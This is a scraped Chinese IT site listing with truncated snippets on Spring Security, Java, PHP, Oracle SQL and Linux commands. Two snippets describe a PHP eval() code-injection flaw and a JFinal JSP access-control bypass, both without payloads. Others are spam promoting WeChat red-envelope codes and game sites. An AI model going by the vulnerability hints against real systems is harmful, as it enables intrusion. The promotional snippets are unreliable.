<a class="tag" taget="_blank" href="/search/springcloud/1.htm">springcloud</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/security/1.htm">security</a><a class="tag" taget="_blank" href="/search/oauth2/1.htm">oauth2</a><a class="tag" taget="_blank" href="/search/springcloud/1.htm">springcloud</a>
<div>引言:回顾之前介绍的OAuth2简单分析与介绍,微服务鉴权管理之OAuth2原理解析(一),前面的部分,我们关注了SpringSecurity是如何完成认证工作的,但是另外一部分核心的内容:过滤器,一直没有提到,我们已经知道SpringSecurity使用了springSecurityFilterChain作为了安全过滤的入口,这一节主要分析一下这个过滤器链都包含了哪些关键的过滤器,并且各自的使命</div>
</li>
<li><a href="/article/1835142827105939456.htm"
title="Python必备库大全,建议留用" target="_blank">Python必备库大全,建议留用</a>
<span class="text-muted">2401_84010176</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
<div>urllib-网络库(stdlib)。requests-网络库。grab–网络库(基于pycurl)。pycurl–网络库(绑定libcurl)。urllib3–PythonHTTP库,安全连接池、支持文件post、可用性高。httplib2–网络库。RoboBrowser–一个简单的、极具Python风格的Python库,无需独立的浏览器即可浏览网页。MechanicalSoup-一个与网站自动</div>
</li>
<li><a href="/article/1835142032612487168.htm"
title="微信红包封面序列号兑换码大全免费2024最新龍年" target="_blank">微信红包封面序列号兑换码大全免费2024最新龍年</a>
<span class="text-muted">全网优惠分享</span>
<div>每当月初的时候,我们都期待着的就是那一句话:“老板发红包了!”纷纷掏出手机,急切地等待着微信红包的到来。红包弹出的那一瞬间,我们的心情也跟着变得愉悦起来。这看似微不足道的小红包,却蕴含着我们对生活的期盼和希望。它不仅仅是简单的财富分享,更是一种情感的表达。微.信搜索:「封面院」关注公众号可领取红包封面序列号。最新微信红包封面序列号:先到先得,抢完为止:1、pdiqgLsY1lR2、vC8tY0VR</div>
</li>
<li><a href="/article/1835089370508521472.htm"
title="等保测评中的关键技术挑战与应对策略" target="_blank">等保测评中的关键技术挑战与应对策略</a>
<span class="text-muted">亿林数据</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E7%AD%89%E4%BF%9D%E6%B5%8B%E8%AF%84/1.htm">等保测评</a>
<div>在信息安全领域,等保测评(信息安全等级保护测评)作为确保信息系统安全性的重要手段,其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力,也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战,并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展,企业信息系统的架构日益复杂,包括分布式系统、微服务架构、云计算环境等。</div>
</li>
<li><a href="/article/1835080678920777728.htm"
title="变态单职业手游网站有哪些 单职业版本手游网站排行榜大全" target="_blank">变态单职业手游网站有哪些 单职业版本手游网站排行榜大全</a>
<span class="text-muted">会飞滴鱼儿</span>
<div>免费在线游戏网站为我们的日常休闲娱乐提供了丰富多样的游戏体验。有些游戏平台相当优质,同时还提供实时动态、活动福利等。现在让我们一起探寻哪些免费在线游戏网站值得你投入时间和精力,沉浸在游戏的世界中,畅玩各种好玩的游戏。2024最火的免费游戏网站排行榜大全───┅┈━━━━━━━━┅┈─────────────Top1──────────游戏名字:游戏豹官网-特点-:手机游戏门户网站日活跃量:1.3w</div>
</li>
<li><a href="/article/1835065923262836736.htm"
title="【网络安全】漏洞挖掘:php代码审计" target="_blank">【网络安全】漏洞挖掘:php代码审计</a>
<span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
<div>未经许可,不得转载。文章目录正文正文在应用程序中,通过一个JavaScript注释发现了一个备份ZIP文件。解压后,获取了应用程序的代码,其中包含如下代码片段:代码首先检查变量$action是否等于'convert',如果是,则继续执行。随后对传入的变量$data使用trim()函数去除两端空白字符,并使用eval()函数执行$data的内容。显然,代码对$data没有进行任何过滤或验证,因此可以</div>
</li>
<li><a href="/article/1835063024088608768.htm"
title="【网络安全 | 代码审计】JFinal之DenyAccessJsp绕过" target="_blank">【网络安全 | 代码审计】JFinal之DenyAccessJsp绕过</a>
<span class="text-muted">秋说</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/1.htm">代码审计</a><a class="tag" taget="_blank" href="/search/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/1.htm">漏洞挖掘</a>
<div>未经许可,不得转载。文章目录前言代码审计推理绕过Tomcat解析JSP总结概念验证阐发前言JFinal是一个基于Java的轻量级MVC框架,用于快速构建Web应用程序。它的设计理念是追求极简、灵活、高效,旨在提高开发效率,减少冗余代码的编写,适合中小型项目以及对性能有较高要求的项目。在较新的JFinal版本中,默认情况下无法直接通过浏览器地址栏输入.jsp文件名来访问对应的JSP文件。也就是说,主</div>
</li>
<li><a href="/article/1835060880107204608.htm"
title="常用类库 Guava 简介" target="_blank">常用类库 Guava 简介</a>
<span class="text-muted">豆瑞瑞</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
<div>简介GoogleGuava是一个由Google开发的Java开源函数库。前身是GoogleCollectionsLibrary,提供了许多简化工具,如缓存、连接器、过滤器、关联数组等仓库代码GitCode-全球开发者的开源社区,开源代码托管平台参考https://github.com/google/guavahttps://github.com/google/guava/wikiRedisStre</div>
</li>
<li><a href="/article/90.htm"
title="java观察者模式" target="_blank">java观察者模式</a>
<span class="text-muted">3213213333332132</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/%E6%B8%B8%E6%88%8F/1.htm">游戏</a><a class="tag" taget="_blank" href="/search/%E8%A7%82%E5%AF%9F%E8%80%85%E6%A8%A1%E5%BC%8F/1.htm">观察者模式</a>
<div>观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。
在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。
这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。
老鹰会变成观察者,母鸡和小鸡是</div>
</li>
<li><a href="/article/217.htm"
title="TFS RESTful API 模拟上传测试" target="_blank">TFS RESTful API 模拟上传测试</a>
<span class="text-muted">ronin47</span>
<div> TFS RESTful API 模拟上传测试。
细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown
模拟POST上传一个图片:
curl --data-binary @/opt/tfs.png http</div>
</li>
<li><a href="/article/344.htm"
title="PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式" target="_blank">PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式</a>
<span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a>
<div>// 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法
abstract class Tiger {
public abstract function climb();
}
class XTiger extends Tiger {
public function climb()</div>
</li>
<li><a href="/article/471.htm"
title="hibernate" target="_blank">hibernate</a>
<span class="text-muted">171815164</span>
<a class="tag" taget="_blank" href="/search/Hibernate/1.htm">Hibernate</a>
<div>main,save
Configuration conf =new Configuration().configure();
SessionFactory sf=conf.buildSessionFactory();
Session sess=sf.openSession();
Transaction tx=sess.beginTransaction();
News a=new </div>
</li>
<li><a href="/article/598.htm"
title="Ant实例分析" target="_blank">Ant实例分析</a>
<span class="text-muted">g21121</span>
<a class="tag" taget="_blank" href="/search/ant/1.htm">ant</a>
<div> 下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。
下面是build.xml的代码:
<?xml version="1</div>
</li>
<li><a href="/article/725.htm"
title="[简单]工作记录_接口返回405原因" target="_blank">[简单]工作记录_接口返回405原因</a>
<span class="text-muted">53873039oycg</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a>
<div> 最近调接口时候一直报错,错误信息是:
responseCode:405
responseMsg:Method Not Allowed
接口请求方式Post. </div>
</li>
<li><a href="/article/852.htm"
title="关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别" target="_blank">关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别</a>
<span class="text-muted">程序员是怎么炼成的</span>
<div>
真正完成类的加载工作是通过调用 defineClass来实现的;
而启动类的加载过程是通过调用 loadClass来实现的;
就是类加载器分为加载和定义
protected Class<?> findClass(String name) throws ClassNotFoundExcept</div>
</li>
<li><a href="/article/979.htm"
title="JDBC学习笔记-JDBC详细的操作流程" target="_blank">JDBC学习笔记-JDBC详细的操作流程</a>
<span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/jdbc/1.htm">jdbc</a>
<div>所有的JDBC应用程序都具有下面的基本流程: 1、加载数据库驱动并建立到数据库的连接。 2、执行SQL语句。 3、处理结果。 4、从数据库断开连接释放资源。
下面我们就来仔细看一看每一个步骤:
其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。
1、加载数据库驱动并建立到数据库的连接:
Html代码
St</div>
</li>
<li><a href="/article/1106.htm"
title="rome创建rss" target="_blank">rome创建rss</a>
<span class="text-muted">antonyup_2006</span>
<a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a><a class="tag" taget="_blank" href="/search/cms/1.htm">cms</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a><a class="tag" taget="_blank" href="/search/struts/1.htm">struts</a><a class="tag" taget="_blank" href="/search/Opera/1.htm">Opera</a>
<div>引用
1.RSS标准
RSS标准比较混乱,主要有以下3个系列
RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W</div>
</li>
<li><a href="/article/1233.htm"
title="html表格和表单基础" target="_blank">html表格和表单基础</a>
<span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/%E8%A1%A8%E6%A0%BC/1.htm">表格</a><a class="tag" taget="_blank" href="/search/%E8%A1%A8%E5%8D%95/1.htm">表单</a><a class="tag" taget="_blank" href="/search/meta/1.htm">meta</a><a class="tag" taget="_blank" href="/search/%E9%94%9A%E7%82%B9/1.htm">锚点</a>
<div>第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,
html是一种标记语言,其实很简单都是固定的格式
_----------------------------------------表格和表单
表格是html的重要组成部分,表格用在body里面的
主要用法如下;
<table>
&</div>
</li>
<li><a href="/article/1360.htm"
title="ibatis如何传入完整的sql语句" target="_blank">ibatis如何传入完整的sql语句</a>
<span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/ibatis/1.htm">ibatis</a>
<div> ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。
解决办法:
<</div>
</li>
<li><a href="/article/1487.htm"
title="精通Oracle10编程SQL(14)开发动态SQL" target="_blank">精通Oracle10编程SQL(14)开发动态SQL</a>
<span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/plsql/1.htm">plsql</a>
<div>/*
*开发动态SQL
*/
--使用EXECUTE IMMEDIATE处理DDL操作
CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2)
is
sql_statement varchar2(100);
begin
sql_statement:='DROP TABLE '||table_name;
</div>
</li>
<li><a href="/article/1614.htm"
title="【Linux命令】Linux工作中常用命令" target="_blank">【Linux命令】Linux工作中常用命令</a>
<span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/linux%E5%91%BD%E4%BB%A4/1.htm">linux命令</a>
<div>不断的总结工作中常用的Linux命令
1.查看端口被哪个进程占用
通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息
netstat -anp | grep 8085
察看进程ID对应的进程占用的端口号
netstat -anp | grep 进程ID
&</div>
</li>
<li><a href="/article/1741.htm"
title="优秀网站和文档收集" target="_blank">优秀网站和文档收集</a>
<span class="text-muted">白糖_</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%AB%99/1.htm">网站</a>
<div>集成 Flex, Spring, Hibernate 构建应用程序
性能测试工具-JMeter
Hmtl5-IOCN网站
Oracle精简版教程网站
鸟哥的linux私房菜
Jetty中文文档
50个jquery必备代码片段
swfobject.js检测flash版本号工具</div>
</li>
<li><a href="/article/1868.htm"
title="angular.extend" target="_blank">angular.extend</a>
<span class="text-muted">boyitech</span>
<a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/angular.extend/1.htm">angular.extend</a><a class="tag" taget="_blank" href="/search/AngularJS+API/1.htm">AngularJS API</a>
<div>angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数: </div>
</li>
<li><a href="/article/1995.htm"
title="java-谷歌面试题-设计方便提取中数的数据结构" target="_blank">java-谷歌面试题-设计方便提取中数的数据结构</a>
<span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
<div>网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。
以下分别用排序数组和大小堆来实现。
使用大小堆:
import java.util.Arrays;
public class MedianInHeap {
/**
* 题目:设计方便提取中数的数据结构
* 设计一个数据结构,其中包含两个函数,1.插</div>
</li>
<li><a href="/article/2122.htm"
title="ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本" target="_blank">ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本</a>
<span class="text-muted">Chen.H</span>
<a class="tag" taget="_blank" href="/search/ajaxFileUpload/1.htm">ajaxFileUpload</a><a class="tag" taget="_blank" href="/search/ie6/1.htm">ie6</a><a class="tag" taget="_blank" href="/search/ie7/1.htm">ie7</a><a class="tag" taget="_blank" href="/search/ie8/1.htm">ie8</a><a class="tag" taget="_blank" href="/search/ie9/1.htm">ie9</a>
<div>jQuery.extend({
handleError: function( s, xhr, status, e ) {
// If a local callback was specified, fire it
if ( s.error ) {
s.error.call( s.context || s, xhr, status, e );
}
</div>
</li>
<li><a href="/article/2249.htm"
title="[机器人制造原则]机器人的电池和存储器必须可以替换" target="_blank">[机器人制造原则]机器人的电池和存储器必须可以替换</a>
<span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E5%88%B6%E9%80%A0/1.htm">制造</a>
<div>
机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....
另外,如果一</div>
</li>
<li><a href="/article/2376.htm"
title="Oracle Multitable INSERT 的用法" target="_blank">Oracle Multitable INSERT 的用法</a>
<span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a>
<div>转载Oracle笔记-Multitable INSERT 的用法
http://blog.chinaunix.net/uid-8504518-id-3310531.html
一、Insert基础用法
语法:
Insert Into 表名 (字段1,字段2,字段3...)
Values (值1,</div>
</li>
<li><a href="/article/2503.htm"
title="专访黑客历史学家George Dyson" target="_blank">专访黑客历史学家George Dyson</a>
<span class="text-muted">datamachine</span>
<a class="tag" taget="_blank" href="/search/on/1.htm">on</a>
<div>20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来</div>
</li>
<li><a href="/article/2630.htm"
title="小学6年级英语单词背诵第一课" target="_blank">小学6年级英语单词背诵第一课</a>
<span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/english/1.htm">english</a><a class="tag" taget="_blank" href="/search/word/1.htm">word</a>
<div>always 总是
rice 水稻,米饭
before 在...之前
live 生活,居住
usual 通常的
early 早的
begin 开始
month 月份
year 年
last 最后的
east 东方的
high 高的
far 远的
window 窗户
world 世界
than 比...更
</div>
</li>
<li><a href="/article/2757.htm"
title="在线IT教育和在线IT高端教育" target="_blank">在线IT教育和在线IT高端教育</a>
<span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/%E6%95%99%E8%82%B2/1.htm">教育</a>
<div>codecademy
http://www.codecademy.com codeschool
https://www.codeschool.com teamtreehouse
http://teamtreehouse.com lynda
http://www.lynda.com/ Coursera
https://www.coursera.</div>
</li>
<li><a href="/article/2884.htm"
title="Struts2 xml校验框架所定义的校验文件" target="_blank">Struts2 xml校验框架所定义的校验文件</a>
<span class="text-muted">蕃薯耀</span>
<a class="tag" taget="_blank" href="/search/Struts2+xml%E6%A0%A1%E9%AA%8C/1.htm">Struts2 xml校验</a><a class="tag" taget="_blank" href="/search/Struts2+xml%E6%A0%A1%E9%AA%8C%E6%A1%86%E6%9E%B6/1.htm">Struts2 xml校验框架</a><a class="tag" taget="_blank" href="/search/Struts2%E6%A0%A1%E9%AA%8C/1.htm">Struts2校验</a>
<div>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
蕃薯耀 2015年7月11日 15:54:59 星期六
http://fa</div>
</li>
<li><a href="/article/3011.htm"
title="mac下安装rar和unrar命令" target="_blank">mac下安装rar和unrar命令</a>
<span class="text-muted">hanqunfeng</span>
<a class="tag" taget="_blank" href="/search/mac/1.htm">mac</a>
<div>1.下载:http://www.rarlab.com/download.htm 选择
RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar</div>
</li>
<li><a href="/article/3138.htm"
title="三种将list转换为map的方法" target="_blank">三种将list转换为map的方法</a>
<span class="text-muted">jackyrong</span>
<a class="tag" taget="_blank" href="/search/list/1.htm">list</a>
<div> 在本文中,介绍三种将list转换为map的方法:
1) 传统方法
假设有某个类如下
class Movie {
private Integer rank;
private String description;
public Movie(Integer rank, String des</div>
</li>
<li><a href="/article/3265.htm"
title="年轻程序员需要学习的5大经验" target="_blank">年轻程序员需要学习的5大经验</a>
<span class="text-muted">lampcy</span>
<a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a>
<div>在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加</div>
</li>
<li><a href="/article/3392.htm"
title="评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓" target="_blank">评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓</a>
<span class="text-muted">nannan408</span>
<div>先来看南方网的一则报道:
再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。
粗暴手术让人发寒
2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。
12月5日,</div>
</li>
<li><a href="/article/3519.htm"
title="使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件" target="_blank">使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件</a>
<span class="text-muted">Everyday都不同</span>
<a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/input/1.htm">input</a><a class="tag" taget="_blank" href="/search/%E5%9B%9E%E8%BD%A6%E9%94%AE%E7%BB%91%E5%AE%9A/1.htm">回车键绑定</a><a class="tag" taget="_blank" href="/search/click/1.htm">click</a><a class="tag" taget="_blank" href="/search/enter/1.htm">enter</a>
<div>假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:
function search() {
//监听函数略......
}
为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():
//回车绑定
$(".search").keydown(fun</div>
</li>
<li><a href="/article/3646.htm"
title="EXT学习记录" target="_blank">EXT学习记录</a>
<span class="text-muted">tntxia</span>
<a class="tag" taget="_blank" href="/search/ext/1.htm">ext</a>
<div>
1. 准备
(1) 官网:http://www.sencha.com/
里面有源代码和API文档下载。
EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。
(2)帮助文档:
想要查看EXT的官方文档的话,可以去这里h</div>
</li>
<li><a href="/article/3773.htm"
title="mybatis3的mapper文件报Referenced file contains errors" target="_blank">mybatis3的mapper文件报Referenced file contains errors</a>
<span class="text-muted">xingguangsixian</span>
<a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a>
<div>最近使用mybatis.3.1.0时无意中碰到一个问题:
The errors below were detected when validating the file "mybatis-3-mapper.dtd" via the file "account-mapper.xml". In most cases these errors can be d</div>
</li>
</ul>
</div>
</div>
</div>
<div>
<div class="container">
<div class="indexes">
<strong>按字母分类:</strong>
<a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
</div>
</div>
</div>
<footer id="footer" class="mb30 mt30">
<div class="container">
<div class="footBglm">
<a target="_blank" href="/">首页</a> -
<a target="_blank" href="/custom/about.htm">关于我们</a> -
<a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
<a target="_blank" href="/sitemap.txt">Sitemap</a> -
<a target="_blank" href="/custom/delete.htm">侵权投诉</a>
</div>
<div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
</div>
</div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>
</body>
</html>